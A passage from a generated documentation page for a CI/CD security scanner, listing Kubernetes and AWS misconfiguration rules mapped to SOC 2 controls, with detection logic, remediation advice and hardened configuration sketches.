- Operator / controller workloads (cert-manager, metrics-server, ingress controllers) legitimately need API access from every pod. Their dedicated SAs should keep automount enabled; leave them out of the cluster-wide disable. The default SA in every namespace is the high-fire case worth disabling.
Source: K8S-034 in the Kubernetes provider.
K8S-035: Container securityContext.runAsUser is 0 HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. K8S-007 covers runAsNonRoot: false (the boolean form). This rule covers the explicit numeric form: a container that sets runAsUser: 0 runs as root regardless of runAsNonRoot being declared elsewhere. Kubernetes won't reject the spec; it just runs the container as root. The two rules are paired so neither shape slips through alone. The pod-level securityContext.runAsUser inherits to every container that doesn't override it; this rule fires on the effective UID, walking the pod level first and then the per-container override.
Recommendation. Set securityContext.runAsUser to a non-zero UID (e.g. 1000 or any application-specific value) on every workload container. The corresponding runAsGroup and fsGroup should also be non-zero. Root inside a container is not isolation: a kernel CVE, a misconfigured mount, or a mis-applied capability collapses straight into the host.
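A sketch of the pod-level shape that inherits to every container; the UID/GID values and image are illustrative:

```yaml
spec:
  securityContext:             # pod-level, inherited by all containers
    runAsNonRoot: true
    runAsUser: 1000
    runAsGroup: 1000
    fsGroup: 1000
  containers:
    - name: app
      image: registry.example.com/app:v1.2.3
      # A container-level securityContext.runAsUser would override the
      # pod level; avoid setting it back to 0 here.
```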
Source: K8S-035 in the Kubernetes provider.
K8S-036: ServiceAccount imagePullSecrets references missing Secret MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Cross-doc correlation: walks every ServiceAccount's imagePullSecrets and confirms the named Secret exists in the same namespace within the manifest set. Misses two cases: secrets created out-of-band (Sealed Secrets, External Secrets, or operator-applied ones) and SAs whose namespace is implicit / not declared in the manifest set. For those, the rule passes; the check errs on the side of false negatives.
Recommendation. Create the missing Kind: Secret of type: kubernetes.io/dockerconfigjson (or dockercfg) in the same namespace before applying the ServiceAccount, or fix the imagePullSecrets reference name. A dangling reference doesn't fail apply; kubelet silently falls back to anonymous registry pulls on every image fetch. Workloads either pull a different image than the operator intended or fail at runtime with ImagePullBackOff after the registry rate-limits the unauthenticated client.
Known false positives.
- Manifests rendered for partial deployment where the secret lives in a parallel manifest set the scanner doesn't see (separate ArgoCD application, Vault-injected, ESO-synced). Add # pipeline-check: ignore K8S-036 or ignore the specific SA name to silence.
Source: K8S-036 in the Kubernetes provider.
K8S-037: ConfigMap data carries a credential-shaped literal HIGH
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Companion to K8S-018 (which scans Kind: Secret). Walks ConfigMap data and binaryData for AKIA-shaped AWS keys and credential-shaped key NAMES. Even when the value is a placeholder, having api_key: REPLACE_ME in a ConfigMap is a maintenance footgun: someone will fill it in and commit. RBAC scoping for configmaps is typically much broader than for secrets, so any credential leak via this path reaches a wider audience.
Recommendation. Move the value out of the ConfigMap. Secrets belong in Kind: Secret (better: SealedSecrets, ExternalSecrets / ESO, SOPS-encrypted manifests, or HashiCorp Vault Agent injection). ConfigMaps are intended for non-sensitive config and are mounted into pods without the access controls Secrets carry; the RoleBinding for configmaps:get is typically far broader than the one for secrets:get. A credential in a ConfigMap is effectively unprotected once any pod can read the namespace's config.
Known false positives.
- ConfigMaps that legitimately carry placeholder names (DEBUG_TOKEN_FORMAT, LICENSE_KEY_HEADER) where the VALUE is a format hint rather than a credential. Rename the key to avoid the credential-shaped name.
Source: K8S-037 in the Kubernetes provider.
K8S-038: NetworkPolicy ingress / egress allows all sources or destinations MEDIUM
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. K8S-032 covers the absence of a default-deny NetworkPolicy. This rule covers the inverse: a NetworkPolicy that exists but contains an ingress: rule with no from: (allow from all) or no ports: filter, or an egress: rule with no to: filter. The from: [] / to: [] shorthand is the canonical mistake. A rule that lists specific peers via podSelector / namespaceSelector / ipBlock passes.
Recommendation. Replace the empty from: [] / to: [] rule with an explicit from: [{podSelector: {matchLabels: {…}}}] or from: [{namespaceSelector: {matchLabels: {…}}}] that names the legitimate peer. An empty from / to peers list means every source / destination: every pod in every namespace, plus every external IP. For the targeted pod this is indistinguishable from having no NetworkPolicy at all, yet it visually appears to enforce a policy; the false-sense-of-security failure mode is worse than no policy.
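A sketch of the passing shape with an explicit peer; the labels, namespace, and port are illustrative:

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-frontend-to-api
  namespace: app
spec:
  podSelector:
    matchLabels:
      app: api                    # the pods this policy protects
  policyTypes: [Ingress]
  ingress:
    - from:                       # explicit peers, not from: []
        - podSelector:
            matchLabels:
              app: frontend
      ports:
        - protocol: TCP
          port: 8443
```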
Known false positives.
- Policies intentionally allowing world traffic to a public ingress controller pod ({app: nginx-ingress, public: true}). Add
# pipeline-check: ignore K8S-038on the specific NetworkPolicy if the wide-open shape is deliberate.
Source: K8S-038 in the Kubernetes provider.
K8S-039: Pod uses shareProcessNamespace: true MEDIUM
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. shareProcessNamespace: true makes every container in the pod share a single PID namespace. Any container can then enumerate every other container's processes (ps), read their environment variables and CLI args from /proc/<pid>/, send them signals, and (with the right capabilities) ptrace them. A compromised sidecar, debug shell, logging agent, or observability exporter gets a free pivot into every primary container's secrets. The default is false; setting it explicitly to true is the failing shape.
Recommendation. Drop spec.shareProcessNamespace: true from the pod spec. Containers in the pod go back to having isolated PID namespaces: each sees only its own processes, can't ptrace neighbors, and can't read their /proc/<pid>/environ for env-var-leaked secrets. If the requirement is sidecar-style log collection or process-level cooperation, prefer a sidecar pattern that exchanges data through a shared volume rather than collapsing the namespace.
Known false positives.
- Debug pods that explicitly need ps / strace across container boundaries, but those are typically ephemeralContainers attached to a running pod, not long-lived pod specs in a manifest. If a permanent workload genuinely requires it, ignore the rule with a documented justification.
Source: K8S-039 in the Kubernetes provider.
K8S-040: Container securityContext.procMount: Unmasked HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. procMount: Unmasked is rarely needed in practice. It exists for nested-container / KubeVirt scenarios where the container itself runs an inner container runtime that needs to set up its own /proc masking. For an ordinary application container, Unmasked is a runtime-isolation regression that exposes kernel-information paths and writable /proc/sys entries to the workload. Pod Security Standards classify Unmasked as 'restricted'-violating; the rule fires when any container (containers, initContainers, ephemeralContainers) explicitly sets procMount: Unmasked.
Recommendation. Remove securityContext.procMount: Unmasked (or set it explicitly to Default). The default Default procMount type masks several kernel- and node-information paths under /proc (/proc/asound, /proc/acpi, /proc/kcore, /proc/keys, /proc/latency_stats, /proc/timer_list, /proc/timer_stats, /proc/sched_debug, /proc/scsi) and remounts /proc/sys as read-only. These maskings are what stop a container from reading the host's kernel structures or writing to /proc/sys and breaking the kernel out of namespace isolation. Unmasked undoes all of that.
Source: K8S-040 in the Kubernetes provider.
KMS-002: KMS key policy grants wildcard KMS actions HIGH
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. kms:* on a key policy is administrative authority over the cipher boundary: CancelKeyDeletion, ScheduleKeyDeletion, ReEncrypt, UpdateKeyDescription, and the data-plane decrypt actions all collapse into one grant. A CI/CD principal almost never needs more than the data-plane subset (Decrypt / GenerateDataKey / Encrypt).
Recommendation. Replace kms:* grants with specific actions needed by the caller (e.g. kms:Decrypt, kms:GenerateDataKey). Key-policy wildcard grants let any holder of the principal re-key, schedule deletion, or export material at will.
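A CloudFormation-style sketch of the scoped statement; the role ARN is illustrative, and a real key policy also needs the account's usual key-administration statement alongside this one so the key stays manageable:

```yaml
Resources:
  BuildKey:
    Type: AWS::KMS::Key
    Properties:
      KeyPolicy:
        Version: "2012-10-17"
        Statement:
          - Sid: AllowCiDataPlane
            Effect: Allow
            Principal:
              AWS: arn:aws:iam::111122223333:role/ci-build   # illustrative
            Action:                 # no kms:* — data-plane subset only
              - kms:Decrypt
              - kms:GenerateDataKey
              - kms:Encrypt
            Resource: "*"           # in a key policy, "*" means this key
```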
Source: KMS-002 in the AWS provider.
LMB-002: Lambda function URL has AuthType=NONE HIGH
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. A Lambda function URL with AuthType=NONE is a public HTTPS endpoint. Anyone who knows the URL can invoke. This is sometimes deliberate (a webhook receiver), but the deliberate version typically signs / validates inside the function; the rule fires regardless because the IAM-side control isn't there.
Recommendation. Set the function URL auth_type to AWS_IAM and grant lambda:InvokeFunctionUrl through IAM. NONE exposes the function to the public internet without authentication.
Source: LMB-002 in the AWS provider.
LMB-004: Lambda resource policy allows wildcard principal CRITICAL
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. A wildcard-principal Allow on a Lambda function resource policy lets anyone invoke. The legitimate case is a service principal (API Gateway, S3 events) where AWS fills in the SourceArn / SourceAccount at invoke time; without those conditions, any account using that service can invoke.
Recommendation. Remove Allow statements with Principal: '*' from every Lambda function resource policy, or scope them with a SourceArn / SourceAccount condition. Service principals (e.g. apigateway.amazonaws.com) are the common legitimate case; ensure they carry a condition.
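A CloudFormation-style sketch of a properly scoped service-principal grant; the function reference and API id (abc123) are illustrative:

```yaml
Resources:
  ApiInvokePermission:
    Type: AWS::Lambda::Permission
    Properties:
      FunctionName: !Ref Webhook            # illustrative function resource
      Action: lambda:InvokeFunction
      Principal: apigateway.amazonaws.com   # service principal, not "*"
      # SourceArn pins the grant to one API; without it, any account's
      # API Gateway could invoke.
      SourceArn: !Sub arn:aws:execute-api:${AWS::Region}:${AWS::AccountId}:abc123/*/POST/hook
```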
Source: LMB-004 in the AWS provider.
PBAC-001: CodeBuild project has no VPC configuration HIGH
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. A CodeBuild project with no VPC configuration runs in AWS-managed network space: egress to the public internet is unrestricted, and every package registry, CDN, and arbitrary endpoint is reachable. Inside a VPC, security-group and VPC-endpoint policies become the egress gate, which is the only practical way to limit a compromised build's exfiltration paths.
Recommendation. Configure the CodeBuild project to run inside a VPC with appropriate subnets and security groups. Use a NAT gateway or VPC endpoints to control outbound internet access and restrict build nodes to only the network resources they require.
Source: PBAC-001 in the AWS provider.
PBAC-002: CodeBuild service role shared across multiple projects MEDIUM
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. One CodeBuild service role across many projects means a compromise of any project's build environment grants access to whatever resources every other project's build needs. Per-project roles cap the radius: a backdoor in the foo-tests build can't reach the deploy-prod build's secrets if each has its own role.
Recommendation. Create a dedicated IAM service role for each CodeBuild project, scoped to only the permissions that specific project requires. This limits the blast radius if one project's build is compromised.
Source: PBAC-002 in the AWS provider.
PBAC-003: CodeBuild security group allows 0.0.0.0/0 all-port egress MEDIUM
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. A security-group egress rule of 0.0.0.0/0 on all ports/protocols means a compromised build can connect to any endpoint on the internet: a typosquatted package registry, a C2 server, an attacker-owned dump endpoint. Even when the build is inside a VPC (PBAC-001), this egress rule negates the network-side gating.
Recommendation. Restrict CodeBuild security-group egress to the specific endpoints builds need (package registries, artifact repositories, STS). A wildcard egress rule lets a compromised build exfiltrate to anywhere on the internet.
Source: PBAC-003 in the AWS provider.
PBAC-005: CodePipeline stage action roles mirror the pipeline role HIGH
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. When stage actions don't set their own roleArn, they fall back to the pipeline-level role, which is the union of every stage's needs. A compromise of any one stage (typically the build, which runs untrusted code) gains the deploy stage's authority, including production deploy credentials. Per-action roles cap the radius.
Recommendation. Give each stage action (Source, Build, Deploy) its own narrowly-scoped IAM role via roleArn on the action declaration. Sharing the pipeline-level role means a compromise of one action (e.g. a build) gains the permissions the deploy stage also needs.
Source: PBAC-005 in the AWS provider.
S3-001: Artifact bucket public access block not fully enabled CRITICAL
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. S3 Block Public Access is the bucket-level circuit breaker that supersedes any future ACL or bucket-policy edit. Without all four settings enabled, a misconfigured CloudFormation change or a stray aws s3api call can re-expose the bucket to the public, even if the bucket had previously been private.
Recommendation. Enable all four S3 Block Public Access settings on the artifact bucket: BlockPublicAcls, IgnorePublicAcls, BlockPublicPolicy, and RestrictPublicBuckets.
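A CloudFormation-style sketch of the passing configuration; the bucket's logical name is illustrative:

```yaml
Resources:
  ArtifactBucket:
    Type: AWS::S3::Bucket
    Properties:
      PublicAccessBlockConfiguration:   # all four must be true to pass
        BlockPublicAcls: true
        IgnorePublicAcls: true
        BlockPublicPolicy: true
        RestrictPublicBuckets: true
```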
Source: S3-001 in the AWS provider.
S3-003: Artifact bucket versioning not enabled MEDIUM
Evidences: CC7.2 System components are monitored for anomalies indicative of malicious acts or failures.
How this is detected. Versioning makes overwrites and deletes recoverable: the previous content of an object survives until lifecycle expires it. Without versioning, an artifact overwrite (a bad pipeline run, a malicious replacement, a typo'd aws s3 cp) is unrecoverable; the original bytes are gone.
Recommendation. Enable S3 versioning on the artifact bucket so that previous artifact versions are retained and rollback is possible. Combine with a lifecycle rule to expire old versions after a retention period.
Source: S3-003 in the AWS provider.
S3-004: Artifact bucket access logging not enabled LOW
Evidences: CC7.2 System components are monitored for anomalies indicative of malicious acts or failures.
How this is detected. S3 server access logging records every API operation against the bucket: who, when, what object, what method. CloudTrail data events overlap but cost more; access logs are the cheap baseline. Without them, an exfiltration via GetObject leaves no trail to investigate.
Recommendation. Enable S3 server access logging for the artifact bucket and direct logs to a separate, centralized logging bucket with restricted write access.
Source: S3-004 in the AWS provider.
S3-005: Artifact bucket missing aws:SecureTransport deny MEDIUM
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary, CC6.7 Data in transit is protected from unauthorized disclosure.
How this is detected. S3 endpoints accept HTTP and HTTPS by default. Without an explicit Deny on aws:SecureTransport=false, a plaintext request (typically from a misconfigured client or an SDK with a stale endpoint) is honored if signed. The bucket-policy Deny is the only enforcement; no account-level switch covers it.
Recommendation. Add a Deny statement for s3:* with Bool aws:SecureTransport=false.
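A CloudFormation-style sketch of the Deny statement; it assumes an ArtifactBucket resource defined in the same template, and covers both the bucket ARN and its objects:

```yaml
Resources:
  ArtifactBucketPolicy:
    Type: AWS::S3::BucketPolicy
    Properties:
      Bucket: !Ref ArtifactBucket
      PolicyDocument:
        Version: "2012-10-17"
        Statement:
          - Sid: DenyInsecureTransport
            Effect: Deny
            Principal: "*"
            Action: "s3:*"
            Resource:
              - !GetAtt ArtifactBucket.Arn
              - !Sub "${ArtifactBucket.Arn}/*"
            Condition:
              Bool:
                aws:SecureTransport: "false"   # rejects plaintext HTTP
```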
Source: S3-005 in the AWS provider.
SIGN-001: No AWS Signer profile defined for Lambda deploys MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. AWS Signer profiles are the upstream of LMB-001's code-signing config. Without a profile defined, no function in the account can enforce code-signing; LMB-001's recommendation has nothing to point at. The profile is the foundation; the per-function code-signing config attaches it.
Recommendation. Create an AWS Signer profile with platform AWSLambda-SHA384-ECDSA and reference it from every Lambda code-signing config used by the pipeline. Without a profile, LMB-001 remediation isn't possible and release artifacts can't be signed at build time.
Source: SIGN-001 in the AWS provider.
SIGN-002: AWS Signer profile is revoked or inactive HIGH
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. A revoked or canceled Signer profile invalidates every signature it ever produced. Lambda functions configured to enforce code-signing fail to deploy until the profile is replaced (or, if UntrustedArtifactOnDeployment = Warn, deploy with a CloudWatch warning the operator rarely reads).
Recommendation. Rotate the signing profile: create a replacement and update every code-signing config that references the revoked profile. A revoked or canceled profile invalidates every signature it produced; Lambdas relying on it will fail verification.
Source: SIGN-002 in the AWS provider.
SM-002: Secrets Manager resource policy allows wildcard principal CRITICAL
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. A wildcard-principal Allow on a Secrets Manager resource policy means any principal in any AWS account can call GetSecretValue (subject to conditions, if any). Always combine with at least aws:SourceAccount or aws:PrincipalOrgID; the lift-and-shift cross-account secret-access pattern needs scoping.
Recommendation. Remove Allow statements whose Principal is * from every Secrets Manager resource policy, or scope them with a Condition restricting the source account/org (aws:PrincipalOrgID). A wildcard-principal policy allows any AWS account to call GetSecretValue on the secret.
Source: SM-002 in the AWS provider.
This page is generated. Edit pipeline_check/core/standards/data/soc2.py (mappings) or scripts/gen_standards_docs.py (intro / per-control prose) and run python scripts/gen_standards_docs.py soc2.